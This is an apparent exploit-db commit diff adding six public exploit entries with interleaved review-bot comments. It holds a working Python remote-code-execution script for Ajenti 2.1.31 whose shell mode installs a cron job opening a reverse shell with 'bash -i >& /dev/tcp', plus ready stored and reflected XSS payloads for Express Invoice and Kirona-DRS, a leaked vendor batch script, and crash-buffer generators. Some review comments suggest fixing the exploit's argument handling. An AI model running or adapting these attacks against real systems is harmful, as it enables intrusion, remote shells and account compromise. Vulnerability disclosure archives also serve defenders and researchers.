DB: 2019-10-15

6 changes to exploits/shellcodes

SpotAuditor 5.3.1.0 - Denial of Service
ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service
Uplay 92.0.0.6280 - Local Privilege Escalation
Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting
Ajenti 2.1.31 - Remote Code Execution
Kirona-DRS 5.5.3.5 - Information Disclosure

parent 2b52915f75
commit 7c5ad20e72

7 changed files with 618 additions and 0 deletions

62  exploits/php/webapps/47496.txt  Normal file

@ -0,0 +1,62 @@
# Exploit Title: Express Invoice 7.12 - 'Customer' Persistent Cross-Site Scripting
# Exploit Author: Debashis Pal
# Date: 2019-10-13
# Vendor Homepage: https://www.nchsoftware.com/
# Source: https://www.nchsoftware.com/invoice/index.html
# Version: Express Invoice v7.12
# CVE : N/A
# Tested on: Windows 7 SP1(32bit)

# About Express Invoice v7.12
==============================
Express Invoice lets you create invoices you can print, email or fax directly to clients for faster payment.

# Vulnerability
================
Persistent Cross site scripting (XSS).

# PoC
======

1. Login as authenticated unprivileged user to Express Invoice version 7.12 web enable service i.e http://A.B.C.D:96 [Default installation].

2. Under "Invoices" Invoices List -> View Invoices -> Add New Invoice -> Customer: Field put </script><script>alert('XSS');</script>

Save the change.

or

Under "Items"
Items -> Add new item-> Item field: put </script><script>alert('XSS');</script>

Save the change.

or

Under "Customers"
Customers -> Add New Customer -> Customer Name: put </script><script>alert('XSS');</script>

Save the change.

or

Under "Quotes"
Quotes -> View Quotes -> Add New Quote -> Customer: put </script><script>alert('XSS');</script>

Save the change.

3. Login in authenticated privileged or unprivileged user to Express Invoice v7.12 web enable service and visit any of Invoices/Items/Customers/Quotes section, Persistent XSS payload will execute.


# Disclosure Timeline
======================
Vulnerability Discover Date: 12-Sep-2019.
Vulnerability notification to vendor via vendor provided web form: 12-Sep-2019 ,13-Sep-2019, 19-Sep-2019, 26-Sep-2019, no responds.
Submit exploit-db : 14-Oct-2019.


# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
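Review bot: the PoC documents four stored injection points (Invoice Customer, Item name, Customer Name, Quote Customer), but the title, like the CSV description, names only 'Customer'; listing every affected field in the header would let defenders who search the index match all of them. The header also omits the browser in which the payload was verified, and 'no responds' in the timeline should read 'no response'. A one-line remediation (HTML-encode stored field values when they are rendered in the Invoices/Items/Customers/Quotes views) would complete the advisory.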

329  exploits/php/webapps/47498.txt  Normal file

@ -0,0 +1,329 @@

# Exploit Title: Kirona-DRS 5.5.3.5 - Information Disclosure
# Discovered Date: 2019-10-03
# Shodan Search: /opt-portal/pages/login.xhtml
# Exploit Author: Ramikan
# Vendor Homepage: https://www.kirona.com/products/dynamic-resource-scheduler/
# Affected Version: DRS 5.5.3.5 may be other versions.
# Tested On Version: DRS 5.5.3.5 on PHP/5.6.14
# Vendor Fix: Unknown
# CVE: CVE-2019-17503,CVE-2019-17504
# Category: Web Apps
# Reference : https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS 5.5.3.5 Multiple Vulnerabilities

# Description:
# The application is vulnerable to the HTML injection, reflected cross site scripting and sensitive data disclosure.

# Vulnerabiity 1:HTML injection and (CVE-2019-17504)
# An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. A reflected Cross-site scripting (XSS)
# vulnerability allows remote attackers to inject arbitrary web script via the /osm/report/ 'password' parameter.

Affected URL: /osm/report/

Affected Parameter: password


POST Request:

POST /osm/report/ HTTP/1.1
Host: 10.50.3.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
Connection: close
Referer: https://10.50.3.148/osm/report/
Upgrade-Insecure-Requests: 1

create=true&password=&login=admin&password='<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--


Response:

HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 14:56:05 GMT
Server: Apache
X-Powered-By: PHP/5.6.14
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-WithXDomainRequestAllowed: 1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Oct 2019 14:56:05 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 728
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head>
<img src='logo.jpg'>
<form method='POST'>
<input type='hidden' name='create' value='true'/>
<input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
<table>
<tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
<tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
<tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
</table>
</form>
</head>
</html>


GET Request:

GET https://10.0.1.110/osm/report/?password=%27%3C%22%20%3E%3C%3Ch1%3EHTML%20Injection-heading%20tag%20used%3C/h1%3E%3Cscript%3Ealert(%22This%20is%20Cross%20Site%20Scripting%22)%3C/script%3E%3C!-- HTTP/1.1
Host: vs-kdrs-l-01.selwoodhousing.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


Response:

HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 14:53:35 GMT
Server: Apache
X-Powered-By: PHP/5.6.14
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
XDomainRequestAllowed: 1
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 03 Oct 2019 14:53:35 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 728
Connection: close
Content-Type: text/html;charset=UTF-8

<html>
<head>
<img src='logo.jpg'>
<form method='POST'>
<input type='hidden' name='create' value='true'/>
<input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/>
<table>
<tr><td>Login:</td><td><input type='login' name='login'/></td></tr>
<tr><td>Password:</td><td><input type='password' name='password'/></td></tr>
<tr><td colspan='2'><input type='submit' value='Login'/> </td></tr>
</table>
</form>
</head>
</html>


***************************************************************************************************************************
Vulnerability 2: Source code and sensitive data disclosure. (CVE-2019-17503)
***************************************************************************************************************************

An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly: it contains sensitive information about the database through the SQL queries within this batch file. This file exposes SQL database information such as database version, table name, column name, etc.

Affected URL: /osm/REGISTER.cmd or /osm_tiles/REGISTER.cmd

# Request:

GET /osm/REGISTER.cmd HTTP/1.1
Host: 10.0.0.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


Response:

HTTP/1.1 200 OK
Date: Thu, 03 Oct 2019 09:23:54 GMT
Server: Apache
Last-Modified: Tue, 07 Nov 2017 09:27:52 GMT
ETag: "1fc4-55d612f6cae13"
Accept-Ranges: bytes
Content-Length: 8132
Connection: close

@echo off

set DEBUGMAPSCRIPT=TRUE

rem
rem Find root path and batch name
rem root path is found relative to the current batch name
rem

rem turn to short filename (remove white spaces)
for %%i in (%0) do (
set SHORT_MAPSCRIPTBATCH_FILE=%%~fsi
set MAPSCRIPTBATCH_FILE=%%~i

)
for %%i in (%SHORT_MAPSCRIPTBATCH_FILE%) do (
set MAPSCRIPTROOTDIR=%%~di%%~pi..\..\..
)

if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTROOTDIR=%MAPSCRIPTROOTDIR%
if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTBATCH_FILE=%MAPSCRIPTBATCH_FILE%

rem
rem find if we are in INTERRACTIVE mode or not and check the parameters
rem
if "%1"=="" goto INTERACTIVE
goto NONINTERRACTIVE


:NONINTERRACTIVE
rem non interractive call so catch the parameters from command line
rem this is supposed to be called from the root DRS directory

if "%2"=="" (
echo Invalid parameter 2
pause
goto :EOF
)

set ACCOUNT=%2
set STATIC=NO
if "%1"=="STATIC" set STATIC=YES

if "%DEBUGMAPSCRIPT%"=="TRUE" echo Command line mode %STATIC% %ACCOUNT%

if "%1"=="STATIC" goto GLOBAL
if "%1"=="DYNAMIC" goto GLOBAL
echo Invalid parameter 1
pause
goto :EOF

:INTERACTIVE
rem Interractive mode : ask for account and static mode
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Interractive mode
echo Open Street Map setup for Xmbrace DRS
set /P ACCOUNT=Account name:
set /P STATIC=Limited map feature (YES/NO):


rem back to the setup directory
cd %MAPSCRIPTROOTDIR%

rem # READ AND DEFINE SETTINGS
for /F "tokens=1,* delims==" %%k in (conf\default.txt) do (
if not "%%k"=="#=" set %%k=%%l
)
if exist CUSTOM\CONF\custom.txt (
for /F "tokens=1,* delims==" %%k in (CUSTOM\CONF\custom.txt) do (
if not "%%k"=="#=" set %%k=%%l
)
)
for /F "tokens=1,* delims==" %%k in (conf\settings.txt) do (
if not "%%k"=="#=" set %%k=%%l
)

if "%APACHE_USE_SSL%"=="TRUE" (
set DEFAULT_HTTP_PROTOCOL=https
set APACHE_USE_SSL_VALUE=true
set DEFAULT_HTTP_PORT=%APACHE_HTTPS_PORT%
) else (
set DEFAULT_HTTP_PROTOCOL=http
set APACHE_USE_SSL_VALUE=false
set DEFAULT_HTTP_PORT=%APACHE_HTTP_PORT%
)

goto GLOBAL



rem
rem good to go in a non interractive mode
rem the following is the generic par of the install, whatever we are in static or dynamic mode
rem
:GLOBAL
if "%DEBUGMAPSCRIPT%"=="TRUE" echo Global section

set MYSQL="MYSQL\MySQL Server 5.6 MariaDB\bin\mysql.exe"

echo delete from %ACCOUNT%.asp_custom_action where CA_CAPTION in ('Show on map','Closest')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo delete from %ACCOUNT%.asp_custom_tab where NAME='Map'> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

set INSERTFIELDS=%ACCOUNT%.asp_custom_action (CA_CAPTION,CA_VIEW,CA_MODE,CA_LIST_MODE,CA_HEIGHT,CA_WIDTH,CA_RESIZABLE,CA_NEED_REFRESH,CA_PROFILES,CA_URL,CA_CUSTOM_TAB,CA_TRIGGER_MODE)

if "%STATIC%"=="YES" goto :STATIC
goto :DYNAMIC



:STATIC

if "%DEBUGMAPSCRIPT%"=="TRUE" echo Static section

echo map=static > ACCOUNTS\%ACCOUNT%\config.txt

echo ^<?php $staticMap=true; ?^>>APACHE\htdocs\osm\mode.php

echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Journey on map','workerView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
if exist req.sql del req.sql
goto FINAL


:DYNAMIC

if "%DEBUGMAPSCRIPT%"=="TRUE" echo Dynamic section

echo map=dynamic > ACCOUNTS\%ACCOUNT%\config.txt

echo ^<?php $staticMap=false; ?^>>APACHE\htdocs\osm\mode.php

echo insert into %INSERTFIELDS% values ('Show on map','jobList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','jobView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Closest','jobList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Closest','jobView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Show on map','workerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','workerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','mandatory',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql
rem %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Show on map','customerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','customerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql
echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

echo insert into %INSERTFIELDS% values ('Show on map','planning','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql


set INSERTFIELDS=%ACCOUNT%.asp_custom_tab (NAME,POSITION,ADMIN,URL,WIDTH,HEIGHT)

echo insert into %INSERTFIELDS% values ('Map',0,'false','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%','100%%','100%%')> req.sql
%MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql

if exist req.sql del req.sql
goto FINAL


:FINAL
echo Map registred for %ACCOUNT%
if "%1"=="" pause
goto :EOF
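Review bot: the GET request under vulnerability 1 carries what appears to be a third-party deployment's internal hostname (`Host: vs-kdrs-l-01.selwoodhousing.local`) next to a URL host of `10.0.1.110`, while the POST example and the REGISTER.cmd request use `10.50.3.148` and `10.0.0.148`; that hostname should be redacted before publication, as the other requests already use private addresses. Two smaller points: 'Vulnerabiity 1' in the heading is misspelled, and the `Reference` URL contains unencoded spaces, so it will not resolve as a link. Pasting the full 8 KB REGISTER.cmd is also more than the finding needs; a short excerpt showing the `%ACCOUNT%.asp_custom_action` and `asp_custom_tab` references, plus the `--user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD%` invocation that reveals how credentials are supplied, would make the disclosure point without republishing the vendor's whole script.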

115  exploits/python/webapps/47497.py  Executable file

@ -0,0 +1,115 @@

# Title: Ajenti 2.1.31 - Remote Code Execution
# Author: Jeremy Brown
# Date: 2019-10-13
# Software Link: https://github.com/ajenti/ajenti
# CVE: N/A
# Tested on: Ubuntu Linux

#!/usr/bin/python
# ajentix.py
#
# Ajenti Remote Command Execution Exploit
#
# -------
# Details
# -------
#
# Ajenti is a web control panel written in Python and AngularJS.
#
# One can locally monitor executed commands on the server while testing
#
# $ sudo ./exec-notify (google for "exec-notify.c", modify output as needed)
# sending proc connector: PROC_CN_MCAST_LISTEN... sent
# Reading process events from proc connector.
# Hit Ctrl-C to exit
#
# Browse over to https://server:8000/view/login/normal to login
#
# .....
# pid=9889 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - test ]
# pid=9889 executed [/bin/su -c /bin/echo SUCCESS - test ]
#
# Modified the JSON request username value to be `id`
#
# pid=7514 executed [/bin/sh -c /bin/su -c "/bin/echo SUCCESS" - `id` ]
# pid=7516 executed [id ]
# pid=7514 executed [/bin/su -c /bin/echo SUCCESS - uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) ]
#
# *ACK.....*
#
# Also the login routine times out after 5 seconds (see auth.py), which
# makes an interactive shell relatively ephemeral. So, we cron job.
#
# $ python3 ajentix.py server.ip shell local-listener.ip
# Done!
#
# $ nc -v -l -p 5555
# Listening on [0.0.0.0] (family 0, port 5555)
# Connection from server.domain 41792 received!
# bash: cannot set terminal process group (18628): Inappropriate ioctl for device
# bash: no job control in this shell
# nobody@server:/var/spool/cron$ ps
# PID TTY TIME CMD
# 6386 ? 00:00:00 /usr/local/bin/ <-- ajenti-panel worker
# 18849 ? 00:00:00 sh
# 18851 ? 00:00:00 bash
# 18859 ? 00:00:00 ps
#
#
# Tested Ajenti 2.1.31 on Ubuntu 18.04, fixed in 2.1.32
#
# Fix commit: https://github.com/ajenti/ajenti/commit/7aa146b724e0e20cfee2c71ca78fafbf53a8767c
#
#

import os
import sys
import ssl
import json
import urllib.request as request

def main():
    if(len(sys.argv) < 2):
        print("Usage: %s <host> [\"cmd\" or shell...ip]\n" % sys.argv[0])
        print("Eg: %s 1.2.3.4 \"id\"" % sys.argv[0])
        print("... %s 1.2.3.4 shell 5.6.7.8\n" % sys.argv[0])
        return

    host = sys.argv[1]
    cmd = sys.argv[2]

    if(cmd == 'shell'):
        if(len(sys.argv) < 4):
            print("Error: need ip to connect back to for shell")
            return

        ip = sys.argv[3]

        shell = "`echo \"* * * * * bash -i >& /dev/tcp/" + ip + "/5555 0>&1\" > /tmp/cronx; crontab /tmp/cronx`"
        username = shell

    else:
        username = "`" + cmd + "`"

    body = json.dumps({'username':username, 'password':'test', 'mode':'normal'})
    byte = body.encode('utf-8')

    url = "https://" + host + ":8000" + "/api/core/auth"

    try:
        req = request.Request(url)

        req.add_header('Content-Type', 'application/json; charset=utf-8')
        req.add_header('Content-Length', len(byte))

        request.urlopen(req, byte, context=ssl._create_unverified_context()) # ignore the cert

    except Exception as error:
        print("Error: %s" % error)
        return

    print("Done!")


if(__name__ == '__main__'):
    main()
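Review bot: the usage guard `if(len(sys.argv) < 2):` is off by one: `cmd = sys.argv[2]` is read unconditionally, so invoking the script with only a host raises IndexError instead of printing the usage text; the check should be `< 3`. The shebang `#!/usr/bin/python` is also not on line 1 (the exploit-db header precedes it) and therefore has no effect, and it names `python` while the usage example runs `python3` and the code imports `urllib.request`; either drop it or move it to the top as `#!/usr/bin/env python3`. Minor: `ssl._create_unverified_context()` is a private CPython helper; the public equivalent is an `ssl.SSLContext` with `check_hostname = False` and `verify_mode = ssl.CERT_NONE`. The fixed version (2.1.32) and the fix commit are stated, which is good; the CSV row could carry that too.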

32  exploits/windows/dos/47494.py  Executable file

@ -0,0 +1,32 @@

# Exploit Title: SpotAuditor 5.3.1.0 - Denial of Service
# Author: Sanjana Shetty
# Date: 2019-10-13
# Version: SpotAuditor 5.3.1.0
# Vendor Homepage: http://www.nsauditor.com
# Software link: http://spotauditor.nsauditor.com/


# <POC by Sanjana Shetty>
# Steps

[1] Install the SpotAuditor software

[2] Access the register functionality

[3] In the name field enter 5000 A's and press enter, this will crash the
application.

==== use below script to create 5000 A's to a text file and copy it to the name field============


print ("# POC by sanjana shetty")

try:
    f = open("file.txt","w")
    junk = "\x41" * 5000
    f.write(junk)
    print ("done")

except (Exception, e):

    print ("#error - ") + str(e)
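Review bot: `except (Exception, e):` does not bind the exception under either interpreter: it is parsed as a tuple of exception classes, so when an error actually occurs the undefined name `e` raises NameError at the point where the original error would have been reported. It should be `except Exception as e:`. On the following line `print ("#error - ") + str(e)` adds `None` (the return value of `print`) to a string under Python 3 and raises TypeError; the concatenation belongs inside the parentheses. The file handle is never closed; `with open("file.txt", "w") as f:` takes care of that. Also, the steps in prose are the actual PoC and the script only writes 5000 bytes of 'A' to a file; the header's 'Denial of Service' claim rests on a GUI crash on paste, and the advisory does not say whether any crash analysis was done, so the entry should be read as a local availability issue only.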

31  exploits/windows/dos/47495.py  Executable file

@ -0,0 +1,31 @@

# Exploit Title: ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service
# Date: 2019-10-12
# Vendor Homepage: https://www.actfax.com/
# Software Link : https://www.actfax.com/download/actfax_setup_x64_ge.exe
# Exploit Author: Achilles
# Tested Version: 6.92
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow

# Steps to Produce the Crash:
# 1.- Run python code : ActiveFax_Server.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open ActiveFaxServer.exe
# 4.- Open the Pop3 Server Config
# 5.- Press New
# 6.- Paste the content of EVIL.txt into the field: 'POP3 Server Address and Login and Password'
# 7.- Press ok Twice
# 8.- And you will see a crash.

#!/usr/bin/env python

buffer = "\x41" * 6000

try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
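Review bot: the script is Python 2 (`print "..."` statements), but its shebang is `#!/usr/bin/env python`, which on current systems commonly resolves to Python 3 and fails with a SyntaxError before writing anything; `#!/usr/bin/env python2`, or `print(...)` calls, would make it run as documented. The shebang is also not on line 1, so it is ignored anyway. The bare `except:` hides the real cause (permission denied, read-only directory) behind 'File cannot be created'; `except IOError as e:` and printing `e` is more useful. The steps refer to `EVIL.txt` while the code writes `Evil.txt`, which only matches on a case-insensitive filesystem, and step 1 names the script `ActiveFax_Server.py` although the file is committed as `47495.py`. Finally, the header states both 'Denial of Service' and 'Local Buffer Overflow'; the PoC shows a crash on a 6000-byte paste but no crash analysis, so only the DoS claim is supported by what is shown.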

43  exploits/windows/local/47493.txt  Normal file

@ -0,0 +1,43 @@

# Exploit Title: Uplay 92.0.0.6280 - Local Privilege Escalation
# Date: 2019-08-07
# Exploit Author: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi
# Vendor Homepage: https://uplay.ubisoft.com/
# Version: 92.0.0.6280
# Tested on: Windows 10 x64
# CVE : N/A

# Vulnerability Description: "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" has in secure permission
# that allows all BUILTIN-USER has full permission. An attacker replace the
# vulnerability execute file with malicious file.

///////////////////////
Proof of Concept
///////////////////////

C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher"
C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher BUILTIN\Users:(F)
BUILTIN\Users:(OI)(CI)(IO)(F)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)




Vulnerability Disclosure Timeline:
==================================
07 Aug, 19 : Found Vulnerability
07 Aug, 19 : Vendor Notification
14 Aug, 19 : Vendor Response
18 Sep, 19 : Vendor Fixed
18 Sep, 19 : Vendor released new patched
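Review bot: the icacls output does substantiate the weak ACL (the two explicit, non-inherited entries `BUILTIN\Users:(F)` and `BUILTIN\Users:(OI)(CI)(IO)(F)` at the top, as opposed to the inherited `(I)(RX)` entries further down that are the normal Program Files defaults), but the description never names which file in that directory is executed by a higher-privileged principal or what that principal is (a service, a scheduled task, an administrator session), so 'Local Privilege Escalation' is asserted rather than shown; the advisory should state the execution path that turns a writable directory into elevated code execution. 'has in secure permission' should read 'has insecure permissions'. A remediation line would help administrators: remove the explicit Full Control entries for BUILTIN\Users so only the inherited read/execute rights remain, and, for detection, monitor for file creation or modification by non-administrative users under that directory. The timeline records 'Vendor Fixed' on 18 Sep but gives no fixed version number.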

@ -6577,6 +6577,8 @@ id,file,description,date,author,type,platform,port
47487,exploits/windows/dos/47487.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiParseImageLoadConfig While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
47488,exploits/windows/dos/47488.txt,"Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
47489,exploits/windows/dos/47489.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
47494,exploits/windows/dos/47494.py,"SpotAuditor 5.3.1.0 - Denial of Service",2019-10-14,"Sanjana shetty",dos,windows,
47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
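Review bot: the author column disagrees with the files being added in this commit: 47495 is credited to `stresser` here while `exploits/windows/dos/47495.py` names `Achilles` as Exploit Author, and 47494 reads `Sanjana shetty` here versus `Sanjana Shetty` in the file. This index is what searchsploit and similar tooling read, so the two should be reconciled before merge.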

@ -10713,6 +10715,7 @@ id,file,description,date,author,type,platform,port
47477,exploits/windows/local/47477.py,"DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)",2019-10-09,"Alessandro Magnosi",local,windows,
47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
47493,exploits/windows/local/47493.txt,"Uplay 92.0.0.6280 - Local Privilege Escalation",2019-10-14,"Kusol Watchara-Apanukorn",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
